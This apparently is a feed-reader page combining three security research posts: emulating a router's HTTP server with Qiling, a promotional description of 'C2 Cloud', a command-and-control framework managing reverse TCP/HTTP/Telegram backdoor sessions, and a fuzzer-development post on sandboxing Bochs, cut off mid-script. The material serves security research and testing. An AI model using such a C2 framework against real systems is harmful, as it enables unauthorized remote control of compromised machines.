Reading view

There are new articles available, click to refresh the page.

Emulation with Qiling

Qiling is an emulation framework that builds upon the Unicorn emulator by providing higher level functionality such as support for dynamic library loading, syscall interception and more.

In this Labs post, we are going to look into Qiling and how it can be used to emulate a HTTP server binary from a router. The target chosen for this research was the NEXXT Polaris 150 travel router.

The firmware was unpacked with binwalk which found a root filesystem containing lots of MIPS binaries.

HTTPD Startup

Before attempting to emulate the HTTP server, it was required to build a basic understanding of how the device initialises. A quick check of the unpacked rcS startup script (under /etc_ro) contained a helpful comment:

#!/bin/sh

... snip ...

# netctrl : system main process, 
# all others will be invoked by it.
netctrl &

... snip ...

Simple enough. The helpful comment states that netctrl will spawn every other process, which should include the HTTP server. Loading netctrl into Ghidra confirmed this. A call to getCfmValue() is made just before httpd is launched via doSystem().

netctrl doesn’t do much more than launching programs via doSystem().

Having a quick look at httpd (spawned by netctrl) in Ghidra shows that it is a dynamically linked MIPS binary that uses pthreads.

Emulation Journey

When emulating a dynamically linked Linux ELF binary, Qiling requires a root filesystem and the binary itself. The filesystem is managed in a similar way to a chroot environment, therefore the binary will only have access to the provided filesystem and not the host filesystem (although this can be configured if necessary).

Since binwalk extracted the root filesystem from the firmware already, the root filesystem can simply be passed to Qiling. The code below does just that and then proceeds to run the /bin/httpd binary.

from qiling import Qiling
from qiling.const import *

def main():
  rootfs_path = "_US_Polaris150_V1.0.0.30_EN_NEX01.bin.extracted/_40.extracted/_3E5000.extracted/cpio-root"
  ql = Qiling([rootfs_path + "/bin/httpd"], rootfs_path, multithread=True, verbose=QL_VERBOSE.DEBUG)
  ql.run()

if __name__ == "__main__":
  main()

Passing multithread=True explicitly instructs Qiling to enable threading support for emulated binaries that use multiple threads, which is required in this case as httpd is using pthreads.

Starting off with verbose=QL_VERBOSE.DEBUG gives a better understanding of how the binary operates as all syscalls (and arguments) are logged.

Running this code presents an issue. Nothing printed to stdout by httpd is shown in the terminal. The very first line of code in the httpd main function uses puts() to print a banner, yet this output cannot be seen.

This is where Qiling hooks can be very useful. Instead of calling the real puts() function inside of the extracted libc a hook can be used to override the puts() implementation and call a custom Python implementation instead. This is achieved using the set_api() function Qiling provides, as show in the code snippet below.

def puts_hook(ql: Qiling):
params = ql.os.resolve_fcall_params({'s': STRING})
ql.log.warning(f"puts_hook: {params['s']}")
return 0

def main():

  ... snip ...

  ql.os.set_api("puts", puts_hook, QL_INTERCEPT.CALL)

  ... snip ...

Every call to puts() is now hooked and will call the Python puts_hook() instead. The hook resolves the string argument passed to puts() and then logs it to the terminal. Since QL_INTERCEPT.CALL is used as the last argument to set_api() then only the hook is called and not the real puts() function. Hooks can also be configured to not override the real function by using QL_INTERCEPT.ENTER / QL_INTERCEPT.EXIT instead.

Running the binary again shows the expected output:

Now the server is running but no ports are open. A simple way to diagnose this is to change the verbosity level in the Qiling constructor to verbose=QL_VERBOSE.DISASM which will disassemble every instruction as its ran.

Emulation hangs on the instruction located at 0x0044a8dc. Navigating to this offset in Ghidra shows a thunk that is calling pthread_create() via the global offset table.

The first cross reference to the thunk comes from the __upgrade() function which is only triggered when a firmware upgrade is requested through the web UI. The second reference comes from the InitWanStatisticTask() function which is always called from the httpd main function. This is likely where the emulation is hanging.

This function doesn’t appear to be critical for the operation of the HTTP server so doesn’t necessarily need to be executed.

There’s a few ways to tackle this:

  • Hook and override pthread_create() or InitWanStatisticTask()
  • Patch the jump to pthread_create() with a NOP

To demonstrate the patching capabilities of Qiling the second option was chosen. The jump to pthread_create() happens at 0x00439f3c inside the InitWanStatisticTask() function.

To generate the machine code that represents a MIPS NOP instruction, the Python bindings for the Keystone framework can be used. The NOP bytes can be then written to the emulator memory using the patch() function, as shown below.

def main():

  ... snip ...

  ks = Ks(KS_ARCH_MIPS, KS_MODE_MIPS32)
  nop, _ = ks.asm("NOP")
  ql.patch(0x00439f3c, bytes(nop))

  ... snip ...

The emulator doesn’t hang anymore but instead prints an error. httpd attempts to open /var/run/goahead.pid but the file doesn’t exist.

Looking at the extracted root filesystem, the /var/run/ directory doesn’t exist. Creating the run directory and an empty goahead.pid file inside the extracted root filesystem gets past this error.

Emulation now errors when httpd tries to open /dev/nvram to retrieve the configured LAN IP address.

Searching for the error string initWebs: cannot find lanIpAddr in NVRAM in httpd highlights the following code:

getCfmValue() is called with two arguments. The first being the NVRAM key to retrieve, and the second being a fixed size out buffer to save the NVRAM value into.

The getCfmValue() function is a wrapper around the nvram_bufget() function from /lib/libnvram-0.9.28.so. Having a closer look at nvram_bufget() shows how /dev/nvram is accessed using ioctl() calls.

Qiling offers a few options to emulate the NVRAM access:

  • Emulate the /dev/nvram file using add_fs_mapper()
  • Hook ioctl() calls and match on the arguments passed
  • Hook the getCfmValue() function at offset 0x0044a910

The last option is the most direct and easiest to implement using Qiling hooks. This time the hook_address() function needs to be used which only hooks a specific address and not a function (unlike the previously used set_api() function).

This means that the hook handler will be called at the target address and then execution will continue as normal, so to skip over the getCfmValue() function implementation the hook must manually set the program counter to the end of the function by writing to ql.arch.regs.arch_pc.

The body of the handler resolves the NVRAM key and the pointer to the NVRAM value out buffer. A check is made for the key lanIpAddr and if it matches then the string 192.168.1.1 is written to the out buffer.

def getCfmValue_hook(ql: Qiling):
  params = ql.os.resolve_fcall_params(
    {
      'key': STRING,
      'out_buf': POINTER
    }
  )

  nvram_key = params["key"]
  nvram_value = ""
  if nvram_key == "lanIpAddr":
    nvram_value = "192.168.1.1"

  ql.log.warning(f"===> getCfmValue_hook: {nvram_key} -> {nvram_value}")

  # save the fake NVRAM value into the out parameter
  ql.mem.string(params["out_buf"], nvram_value)

  # force return from getCfmValue
  ql.arch.regs.arch_pc = 0x0044a92c

def main():

  ... snip ...

  ql.hook_address(getCfmValue_hook, 0x0044a910)

  ... snip ...

httpd now runs for a few seconds then crashes with a [Errno 11] Resource temporarily unavailable. The error message is from Qiling and related to the ql_syscall_recv() handler which is responsible for emulating the recv() syscall.

Error number 11 translates to EWOULDBLOCK / EAGAIN which is triggered when a read is attempted on a non-blocking socket but there is no data available, therefore the read would be blocked. To configure non-blocking mode the fcntl() syscall is generally used, which sets the O_NONBLOCK flag on the socket. Looking for cross references to this syscall highlighted the following function at 0x004107c8:

socketSetBlock()  takes a socket file descriptor and a boolean to disable non-blocking mode on the file descriptor. The current file descriptor flags are retrieved at line 17 or 24 and the O_NONBLOCK flags is set / cleared at line 20 or 27. Finally, the new flags value is set for the socket at line 30 with a call to fcntl().

This function is an ideal candidate for hooking to ensure that O_NONBLOCK is never enabled. By hooking socketSetBlock() and always forcing the disable_non_block argument to be any non-zero value should make the function always disable O_NONBLOCK.

Inside the socketSetBlock_hook the disable_non_block argument is set to 1 by directly modifying the value inside the a1 register:

def socketSetBlock_hook(ql: Qiling):
    ql.log.warning("===> socketSetBlock_hook: disabling O_NONBLOCK")
    # force disable_non_block
    ql.arch.regs.a1 = 1

def main():
    ... snip ...
    ql.hook_address(socketSetBlock_hook, 0x004107c8)
    ... snip ...

If this helper function didn’t exist then the fcntl() syscall would need to be hooked using the set_syscall() function from Qiling.

Running the emulator again opens up port 8080! Navigating to localhost:8080 in a web browser loads a partially rendered login page and then the emulator crashes.

The logs show an Invalid memory write inside a specific thread. There aren’t many details to go off.

Since this error originates from the main thread and the emulated binary is effectively single threaded (after the NOP patch) the multithread argument passed to the Qiling constructor was changed to False.

Restarting the emulation and reloading the login page worked without crashing!

NVRAM stores the password which is retrieved using the previously hooked getCfmValue() function. After returning a fake password from getCfmValue_hook() the device can be logged into.

def getCfmValue_hook(ql: Qiling):
    ... snip ...
    elif nvram_key == "Password":
        nvram_value = "password"
    ... snip ...

Logging in causes the emulator to crash once again. This time, /proc/net/arp is expected to exist but the root filesystem doesn’t contain it.

Simply creating this file in the root filesystem fixes this issue.

After re-running the emulation everything seems to be working. The webpages can be navigated to without the emulator crashing! To make the pages fully functional required NVRAM values must exist which is an easy fix using the getCfmValue_hook.

Conclusion

Hopefully this Labs post gave a useful insight into some of the capabilities of Qiling. Qiling has many more features not covered here, including support for emulating bare metal binaries, GDB server integration, snapshots, fuzzing, code coverage and much more.

Finally, a few things to note:

  • Multithreading support isn’t perfect
  • More often than not `Qiling1 will fail to handle multiple threads correctly
  • Privileged ports are remapped to the original port + 8000 unless the emulation is ran as a privileged user
  • Reducing the verbosity with the verbose parameter can significantly speed up execution
  • Qiling documentation is often missing or outdated

The full code used throughout this article can be found below:

from qiling.os.const import *
from qiling.os.posix.syscall import *
from keystone import *


def puts_hook(ql: Qiling):
    params = ql.os.resolve_fcall_params({'s': STRING})
    ql.log.warning(f"===> puts_hook: {params['s']}")
    return 0


def getCfmValue_hook(ql: Qiling):
    params = ql.os.resolve_fcall_params(
        {
            'key': STRING,
            'out_buf': POINTER
        }
    )

    nvram_key = params["key"]
    nvram_value = ""
    if nvram_key == "lanIpAddr":
        nvram_value = "192.168.1.1"
    elif nvram_key == "wanIpAddr":
        nvram_value = "1.2.3.4"
    elif nvram_key == "workMode":
        nvram_value = "router"
    elif nvram_key == "Login":
        nvram_value = "admin"
    elif nvram_key == "Password":
        nvram_value = "password"

    ql.log.warning(f"===> getCfmValue_hook: {nvram_key} -> {nvram_value}")

    # save the fake NVRAM value into the out parameter
    ql.mem.string(params["out_buf"], nvram_value)
    # force return from getCfmValue
    ql.arch.regs.arch_pc = 0x0044a92c


def socketSetBlock_hook(ql: Qiling):
    ql.log.warning(f"===> socketSetBlock_hook: disabling O_NONBLOCK")
    # force disable_non_block
    ql.arch.regs.a1 = 1


def main():
    rootfs_path = "_US_Polaris150_V1.0.0.30_EN_NEX01.bin.extracted/_40.extracted/_3E5000.extracted/cpio-root"
    ql = Qiling([rootfs_path + "/bin/httpd"], rootfs_path, multithread=False, verbose=QL_VERBOSE.DEBUG)

    ql.os.set_api("puts", puts_hook, QL_INTERCEPT.CALL)

    # patch pthread_create() call in `InitWanStatisticTask`
    ks = Ks(KS_ARCH_MIPS, KS_MODE_MIPS32)
    nop, _ = ks.asm("NOP")
    ql.patch(0x00439f3c, bytes(nop))

    ql.hook_address(getCfmValue_hook, 0x0044a910)
    ql.hook_address(socketSetBlock_hook, 0x004107c8)

    ql.run()


if __name__ == "__main__":
    main()

The post Emulation with Qiling appeared first on LRQA Nettitude Labs.

C2-Cloud - The C2 Cloud Is A Robust Web-Based C2 Framework, Designed To Simplify The Life Of Penetration Testers


The C2 Cloud is a robust web-based C2 framework, designed to simplify the life of penetration testers. It allows easy access to compromised backdoors, just like accessing an EC2 instance in the AWS cloud. It can manage several simultaneous backdoor sessions with a user-friendly interface.

C2 Cloud is open source. Security analysts can confidently perform simulations, gaining valuable experience and contributing to the proactive defense posture of their organizations.

Reverse shells support:

  1. Reverse TCP
  2. Reverse HTTP
  3. Reverse HTTPS (configure it behind an LB)
  4. Telegram C2

Demo

C2 Cloud walkthrough: https://youtu.be/hrHT_RDcGj8
Ransomware simulation using C2 Cloud: https://youtu.be/LKaCDmLAyvM
Telegram C2: https://youtu.be/WLQtF4hbCKk

Key Features

🔒 Anywhere Access: Reach the C2 Cloud from any location.
🔄 Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
🖱️ One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
📜 Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.

Tech Stack

🛠️ Flask: Serving web and API traffic, facilitating reverse HTTP(s) requests.
🔗 TCP Socket: Serving reverse TCP requests for enhanced functionality.
🌐 Nginx: Effortlessly routing traffic between web and backend systems.
📨 Redis PubSub: Serving as a robust message broker for seamless communication.
🚀 Websockets: Delivering real-time updates to browser clients for enhanced user experience.
💾 Postgres DB: Ensuring persistent storage for seamless continuity.

Architecture

Application setup

  • Management port: 9000
  • Reversse HTTP port: 8000
  • Reverse TCP port: 8888

  • Clone the repo

  • Optional: Update chait_id, bot_token in c2-telegram/config.yml
  • Execute docker-compose up -d to start the containers Note: The c2-api service will not start up until the database is initialized. If you receive 500 errors, please try after some time.

Credits

Inspired by Villain, a CLI-based C2 developed by Panagiotis Chartas.

License

Distributed under the MIT License. See LICENSE for more information.

Contact



Fuzzer Development 3: Building Bochs, MMU, and File I/0

By: h0mbre

Background

This is the next installment in a series of blogposts detailing the development process of a snapshot fuzzer that aims to utilize Bochs as a target execution engine. You can find the fuzzer and code in the Lucid repository

Introduction

We’re continuing today on our journey to develop our fuzzer. Last time we left off, we had developed the beginnings of a context-switching infrastructure so that we could sandbox Bochs (really a test program) from touching the OS kernel during syscalls.

In this post, we’re going to go over some changes and advancements we’ve made to the fuzzer and also document some progress related to Bochs itself.

Syscall Infrastructure Update

After putting out the last blogpost, I got some really good feedback and suggestions by Fuzzing discord legend WorksButNotTested, who informed me that we could cut down on a lot of complexity if we scrapped the full context-switching/C-ABI-to-Syscall-ABI-Register-Translation routines all together and simply had Bochs call a Rust function from C for syscalls. This is very intuitive and obvious in hindsight and I’m admittedly a little embarrassed to have overlooked this possibility.

Previously, in our custom Musl code, we would have a C function call like so:

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8 __asm__("r8") = a5;
	register long r9 __asm__("r9") = a6;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3), "r"(r10), "r"(r8), "r"(r9) : "rcx", "r11", "memory");
	return ret;
}

This is the function that is called when the program needs to make a syscall with 6 arguments. In the previous blog, we changed this function to be an if/else such that if the program was running under Lucid, we would instead call into Lucid’s context-switch function after shuffling the C ABI registers to Syscall registers like so:

static __inline long __syscall6_original(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8  __asm__("r8")  = a5;
	register long r9  __asm__("r9")  = a6;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2), "d"(a3), "r"(r10),
							"r"(r8), "r"(r9) : "rcx", "r11", "memory");

	return ret;
}

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
    if (!g_lucid_ctx) { return __syscall6_original(n, a1, a2, a3, a4, a5, a6); }
	
    register long ret;
    register long r12 __asm__("r12") = (size_t)(g_lucid_ctx->exit_handler);
    register long r13 __asm__("r13") = (size_t)(&g_lucid_ctx->register_bank);
    register long r14 __asm__("r14") = SYSCALL;
    register long r15 __asm__("r15") = (size_t)(g_lucid_ctx);
    
    __asm__ __volatile__ (
        "mov %1, %%rax\n\t"
	"mov %2, %%rdi\n\t"
	"mov %3, %%rsi\n\t"
	"mov %4, %%rdx\n\t"
	"mov %5, %%r10\n\t"
	"mov %6, %%r8\n\t"
	"mov %7, %%r9\n\t"
        "call *%%r12\n\t"
        "mov %%rax, %0\n\t"
        : "=r" (ret)
        : "r" (n), "r" (a1), "r" (a2), "r" (a3), "r" (a4), "r" (a5), "r" (a6),
		  "r" (r12), "r" (r13), "r" (r14), "r" (r15)
        : "rax", "rcx", "r11", "memory"
    );
	
	return ret;
}

So this was quite involved. I was very fixated on the idea that “Lucid has to be the kernel. And when userland programs execute a syscall, their state is saved and execution is started in the kernel”. This proved to lead me astray since such a complicated routine is not needed for our purposes, we are not actually a kernel, we just want to sandbox away syscalls for one specific program who behaves pretty well. WorksButNotTested instead suggested just calling a Rust function like so:

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
	if (g_lucid_syscall)
		return g_lucid_syscall(g_lucid_ctx, n, a1, a2, a3, a4, a5, a6);
	
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8 __asm__("r8") = a5;
	register long r9 __asm__("r9") = a6;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3), "r"(r10), "r"(r8), "r"(r9) : "rcx", "r11", "memory");
	return ret;
}

Obviously this is a much simpler solution and we get to avoid scrambling registers/saving state/inline-assembly and the rest of it. To set this function up, we just simply created a new function pointer global variable in lucid.h in Musl and gave it a definition in src/lucid.c which can you see in the Musl patches in the repo. g_lucid_syscall looks like this on the Rust side:

pub extern "C" fn lucid_syscall(contextp: *mut LucidContext, n: usize,
    a1: usize, a2: usize, a3: usize, a4: usize, a5: usize, a6: usize)
    -> u64 

We get to use the C ABI to our advantage and maintain the semantics of how a program would normally use Musl, and it’s just a very much appreciated suggestion and I couldn’t be happier with how it turned out.

Calling Convention Changes

During this refactoring for syscalls, I also simplified the way our context-switching calling convention would work. Instead of using 4 separate registers for the calling convention, I decided it was doable by just passing a pointer to the Lucid execution context and having the context_switch function itself work out how it should behave based on the context’s values. In essence, we’re moving complexity from the caller-side to the callee-side. This means that the complexity doesn’t keep recurring throughout the codebase, it is encapsulated one time, in the context_switch logic itself. This does require some hacky/brittle code however, for instance we have to hardcode some struct offsets for the Lucid execution data structure, but that is a small price to pay in my opinion for drastically reduced complexity. The context_switch code has been changed to the following

extern "C" { fn context_switch(); }
global_asm!(
    ".global context_switch",
    "context_switch:",

    // Save the CPU flags before we do any operations
    "pushfq",

    // Save registers we use for scratch
    "push r14",
    "push r13",

    // Determine what execution mode we're in
    "mov r14, r15",
    "add r14, 0x8",     // mode is at offset 0x8 from base
    "mov r14, [r14]",
    "cmp r14d, 0x0",
    "je save_bochs",

    // We're in Lucid mode so save Lucid GPRs
    "save_lucid: ",
    "mov r14, r15",
    "add r14, 0x10",    // lucid_regs is at offset 0x10 from base
    "jmp save_gprs",             

    // We're in Bochs mode so save Bochs GPRs
    "save_bochs: ",
    "mov r14, r15",
    "add r14, 0x90",    // bochs_regs is at offset 0x90 from base
    "jmp save_gprs",

You can see that once we hit the context_switch function we save the CPU flags before we do anything that would affect them, then we save a couple of registers that we use as scratch registers. Then we’re free to check the value of context->mode in order to determine what mode of execution we’re in. Based on that value, we are able to know what register bank to use to save our general-purpose registers. So yes, we do have to hardcode some offsets, but I believe overall this is a much better API and system for context-switching callees and the data-structure itself should be relatively stable at this point and not require massive refactoring.

Introducing Faults

Since the last blog-post, I’ve introduced the concept of Fault which is an error class that is reserved for instances when some sort of error is encountered during either context-switching code or syscall-handling. This error is distinct from our highest-level error LucidErr. Ultimately, these faults are plumbed back up to Lucid when they are encountered so that Lucid can handle them. As of this moment, Lucid calls any Fault fatal.

We are able to plumb these back up to Lucid because before starting Bochs execution we now save Lucid’s state and context-switch into starting Bochs:

#[inline(never)]
pub fn start_bochs(context: &mut LucidContext) {
    // Set the execution mode and the reason why we're exiting the Lucid VM
    context.mode = ExecMode::Lucid;
    context.exit_reason = VmExit::StartBochs;

    // Set up the calling convention and then start Bochs by context switching
    unsafe {
        asm!(
            "push r15", // Callee-saved register we have to preserve
            "mov r15, {0}", // Move context into R15
            "call qword ptr [r15]", // Call context_switch
            "pop r15",  // Restore callee-saved register
            in(reg) context as *mut LucidContext,
        );
    }
}

We make some changes to the execution context, namely marking the execution mode (Lucid-mode) and setting the reason why we’re context-switching (to start Bochs). Then in the inline assembly, we call the function pointer at offset 0 in the execution context structure:

// Execution context that is passed between Lucid and Bochs that tracks
// all of the mutable state information we need to do context-switching
#[repr(C)]
#[derive(Clone)]
pub struct LucidContext {
    pub context_switch: usize,  // Address of context_switch()

So then our Lucid state is saved in the context_switch routine and we are then passed to this logic:

// Handle Lucid context switches here
    if LucidContext::is_lucid_mode(context) {
        match exit_reason {
            // Dispatch to Bochs entry point
            VmExit::StartBochs => {
                jump_to_bochs(context);
            },
            _ => {
                fault!(context, Fault::BadLucidExit);
            }
        }
    }

Finally, we call jump_to_bochs:

// Standalone function to literally jump to Bochs entry and provide the stack
// address to Bochs
fn jump_to_bochs(context: *mut LucidContext) {
    // RDX: we have to clear this register as the ABI specifies that exit
    // hooks are set when rdx is non-null at program start
    //
    // RAX: arbitrarily used as a jump target to the program entry
    //
    // RSP: Rust does not allow you to use 'rsp' explicitly with in(), so we
    // have to manually set it with a `mov`
    //
    // R15: holds a pointer to the execution context, if this value is non-
    // null, then Bochs learns at start time that it is running under Lucid
    //
    // We don't really care about execution order as long as we specify clobbers
    // with out/lateout, that way the compiler doesn't allocate a register we 
    // then immediately clobber
    unsafe {
        asm!(
            "xor rdx, rdx",
            "mov rsp, {0}",
            "mov r15, {1}",
            "jmp rax",
            in(reg) (*context).bochs_rsp,
            in(reg) context,
            in("rax") (*context).bochs_entry,
            lateout("rax") _,   // Clobber (inout so no conflict with in)
            out("rdx") _,       // Clobber
            out("r15") _,       // Clobber
        );
    }
}

Full-blown context-switching like this, allows us to encounter a Fault and then pass that error back to Lucid for handling. In the fault_handler, we set the Fault type in the execution context, and then we attempt to restore execution back to Lucid:

// Where we handle faults that may occur when context-switching from Bochs. We
// just want to make the fault visible to Lucid so we set it in the context,
// then we try to restore Lucid execution from its last-known good state
pub fn fault_handler(contextp: *mut LucidContext, fault: Fault) {
    let context = unsafe { &mut *contextp };
    match fault {
        Fault::Success => context.fault = Fault::Success,
        ...
    }

    // Attempt to restore Lucid execution
    restore_lucid_execution(contextp);
}
// We use this function to restore Lucid execution to its last known good state
// This is just really trying to plumb up a fault to a level that is capable of
// discerning what action to take. Right now, we probably just call it fatal. 
// We don't really deal with double-faults, it doesn't make much sense at the
// moment when a single-fault will likely be fatal already. Maybe later?
fn restore_lucid_execution(contextp: *mut LucidContext) {
    let context = unsafe { &mut *contextp };
    
    // Fault should be set, but change the execution mode now since we're
    // jumping back to Lucid
    context.mode = ExecMode::Lucid;

    // Restore extended state
    let save_area = context.lucid_save_area;
    let save_inst = context.save_inst;
    match save_inst {
        SaveInst::XSave64 => {
            // Retrieve XCR0 value, this will serve as our save mask
            let xcr0 = unsafe { _xgetbv(0) };

            // Call xrstor to restore the extended state from Bochs save area
            unsafe { _xrstor64(save_area as *const u8, xcr0); }             
        },
        SaveInst::FxSave64 => {
            // Call fxrstor to restore the extended state from Bochs save area
            unsafe { _fxrstor64(save_area as *const u8); }
        },
        _ => (), // NoSave
    }

    // Next, we need to restore our GPRs. This is kind of different order than
    // returning from a successful context switch since normally we'd still be
    // using our own stack; however right now, we still have Bochs' stack, so
    // we need to recover our own Lucid stack which is saved as RSP in our 
    // register bank
    let lucid_regsp = &context.lucid_regs as *const _;

    // Move that pointer into R14 and restore our GPRs. After that we have the
    // RSP value that we saved when we called into context_switch, this RSP was
    // then subtracted from by 0x8 for the pushfq operation that comes right
    // after. So in order to recover our CPU flags, we need to manually sub
    // 0x8 from the stack pointer. Pop the CPU flags back into place, and then 
    // return to the last known good Lucid state
    unsafe {
        asm!(
            "mov r14, {0}",
            "mov rax, [r14 + 0x0]",
            "mov rbx, [r14 + 0x8]",
            "mov rcx, [r14 + 0x10]",
            "mov rdx, [r14 + 0x18]",
            "mov rsi, [r14 + 0x20]",
            "mov rdi, [r14 + 0x28]",
            "mov rbp, [r14 + 0x30]",
            "mov rsp, [r14 + 0x38]",
            "mov r8, [r14 + 0x40]",
            "mov r9, [r14 + 0x48]",
            "mov r10, [r14 + 0x50]",
            "mov r11, [r14 + 0x58]",
            "mov r12, [r14 + 0x60]",
            "mov r13, [r14 + 0x68]",
            "mov r15, [r14 + 0x78]",
            "mov r14, [r14 + 0x70]",
            "sub rsp, 0x8",
            "popfq",
            "ret",
            in(reg) lucid_regsp,
        );
    }
}

As you can see, restoring Lucid state and resuming execution is quite involved, One tricky thing we had to deal with was the fact that right now, when a Fault occurs, we are likely operating in Bochs mode which means that our stack is Bochs’ stack and not Lucid’s. So even though this is technically just a context-switch, we had to change the order around a little bit to pop Lucid’s saved state into our current state and resume execution. Now when Lucid calls functions that context-switch, it can simply check the “return” value of such functions by checking if there was a Fault noted in the execution context like so:

	// Start executing Bochs
    prompt!("Starting Bochs...");
    start_bochs(&mut lucid_context);

    // Check to see if any faults occurred during Bochs execution
    if !matches!(lucid_context.fault, Fault::Success) {
        fatal!(LucidErr::from_fault(lucid_context.fault));
    }

Pretty neat imo!

Sandboxing Thread-Local-Storage

Coming into this project, I honestly didn’t know much about thread-local-storage (TLS) except that it was some magic per-thread area of memory that did stuff. That is still the entirety of my knowledge really, except now I’ve seen some code that allocates that memory and initializes it, which helps me appreciate what is really going on. Once I implemented the Fault system discussed above, I noticed that Lucid would segfault when exiting. After some debugging, I realized it was calling a function pointer that was a bogus address. How could this have happened? Well, after some digging, I noticed that right before that function call, an offset of the fs register was used to load the address from memory. Typically, fs is used to access TLS. So at that point, I had a strong suspicion that Bochs had somehow corrupted the value of my fs register. So I did a quick grep through Musl looking for fs register access and found the following:

/* Copyright 2011-2012 Nicholas J. Kain, licensed under standard MIT license */
.text
.global __set_thread_area
.hidden __set_thread_area
.type __set_thread_area,@function
__set_thread_area:
	mov %rdi,%rsi           /* shift for syscall */
	movl $0x1002,%edi       /* SET_FS register */
	movl $158,%eax          /* set fs segment to */
	syscall                 /* arch_prctl(SET_FS, arg)*/
	ret

So this function, __set_thread_area uses an inline syscall instruction to call arch_prctl to directly manipulate the fs register. This made a lot of sense because, if the syscall instruction was indeed called, we wouldn’t intercept this with our syscall sandboxing infrastructure because we never instrumented this, we’ve only instrumented what boils down to the syscall() function wrapper in Musl. So this would escape our sandbox and directly manipulate fs. Sure enough, I discovered that this function is called during TLS initialization in src/env/__init_tls.c:

int __init_tp(void *p)
{
	pthread_t td = p;
	td->self = td;
	int r = __set_thread_area(TP_ADJ(p));
	if (r < 0) return -1;
	if (!r) libc.can_do_threads = 1;
	td->detach_state = DT_JOINABLE;
	td->tid = __syscall(SYS_set_tid_address, &__thread_list_lock);
	td->locale = &libc.global_locale;
	td->robust_list.head = &td->robust_list.head;
	td->sysinfo = __sysinfo;
	td->next = td->prev = td;
	return 0;
}

So in this __init_tp function, we’re given a pointer and then we call TP_ADJ macro to do some arithmetic on the pointer and pass that value to __set_thread_area so that fs is manipulated. Great, now how do we sandbox this? I wanted to avoid messing with the inline assembly in __set_thread_area itself, so I just changed the source so that Musl would instead just utilize the syscall() wrapper function which calls our instrumented syscall functions under the hood, like so:

#ifndef ARCH_SET_FS
#define ARCH_SET_FS 0x1002
#endif /* ARCH_SET_FS */

int __init_tp(void *p)
{
	pthread_t td = p;
	td->self = td;
	int r = syscall(SYS_arch_prctl, ARCH_SET_FS, TP_ADJ(p));
	//int r = __set_thread_area(TP_ADJ(p));

Now, we can intercept this syscall in Lucid and effectively do nothing really. As long as there are not other direct accesses to fs (and there might be still!), we should be fine here. I also adjusted the Musl code so that if we’re running under Lucid, we provide a TLS-area via the execution context by just creating a mock area of what Musl calls the builtin_tls:

static struct builtin_tls {
	char c;
	struct pthread pt;
	void *space[16];
} builtin_tls[1];

So now, when __init_tp is called, the pointer it is giving points to our own TLS block of memory we’ve created in the execution context so that we now have access to things like errno in Lucid:

if (libc.tls_size > sizeof builtin_tls) {
#ifndef SYS_mmap2
#define SYS_mmap2 SYS_mmap
#endif
		__asm__ __volatile__ ("int3"); // Added by me just in case
		mem = (void *)__syscall(
			SYS_mmap2,
			0, libc.tls_size, PROT_READ|PROT_WRITE,
			MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
		/* -4095...-1 cast to void * will crash on dereference anyway,
		 * so don't bloat the init code checking for error codes and
		 * explicitly calling a_crash(). */
	} else {
		// Check to see if we're running under Lucid or not
		if (!g_lucid_ctx) { mem = builtin_tls; }
		else { mem = &g_lucid_ctx->tls; }
	}

	/* Failure to initialize thread pointer is always fatal. */
	if (__init_tp(__copy_tls(mem)) < 0)
		a_crash();
#[repr(C)]
#[derive(Clone)]
pub struct Tls {
    padding0: [u8; 8], // char c
    padding1: [u8; 52], // Padding to offset of errno which is 52-bytes
    pub errno: i32,
    padding2: [u8; 144], // Additional padding to get to 200-bytes total
    padding3: [u8; 128], // 16 void * values
}

So now for example, if during a read syscall, we get passed a NULL buffer, we can return an error code and set errno appropriately from the syscall handler in Lucid:

            // Now we need to make sure the buffer passed to read isn't NULL
            let buf_p = a2 as *mut u8;
            if buf_p.is_null() {
                context.tls.errno = libc::EINVAL;
                return -1_i64 as u64;
            }

There may still be other accesses to fs and gs that I’m not currently sandboxing, but we haven’t reached that part of development yet.

Building Bochs

I put off building and loading Bochs for a long time because I wanted to make sure I had the foundations of context-switching and syscall-sandboxing built. I also was worried that it would be difficult since getting vanilla Bochs built --static-pie was difficult for me initially. To complicate building Bochs in general, we need to build Bochs against our custom Musl. This means that we’ll need to have a compiler that we can tell to ignore whatever standard C library it normally uses and use our custom Musl libc instead. This proved quite tedious and difficult for me. Once I was successful, I came to realize that wasn’t enough. Bochs, being a C++ code base, also required access to standard C++ library functions. This simply could not work as I had done previously with the test program because I didn’t have a C++ library that we could use that had been built against our custom Musl.

Luckily, there is an awesome project called the musl-cross-make project, which aims to help people build their own Musl toolchains from scratch. This is perfect for what we need because we require a complete toolchain. We need to support the C++ standard library and it needs to be built with our custom Musl. So to do this, we use the The GNU C++ Library, libstdc++, that is part of the gcc project.

musl-cross-make will pull down all of constituent tool-chain components and create a from scratch tool chain that will utilize a Musl libc and a libstdc++ built against that Musl. Then all we have to do for our purposes, is recompile that Musl libc with our custom patches that we make with Lucid, and then use the tool chain to compile Bochs as --static-pie. It really was as simple as:

  • git clone musl-cross-make
  • configure an x86_64 tool chain target
  • build the tool chain
  • go into its Musl directory, apply our Musl patches
  • configure Musl to build/install into the musl-cross-make output directory
  • re-build Musl libc
  • configure Bochs to use the new toolchain and set the --static-pie flag

This is the Bochs configuration file that I used to build Bochs:

#!/bin/sh

CC="/home/h0mbre/musl_stuff/musl-cross-make/output/bin/x86_64-linux-musl-gcc"
CXX="/home/h0mbre/musl_stuff/musl-cross-make/output/bin/x86_64-linux-musl-g++"
CFLAGS="-Wall --static-pie -fPIE"
CXXFLAGS="$CFLAGS"

export CC
export CXX
export CFLAGS
export CXXFLAGS

./configure --enable-sb16 \
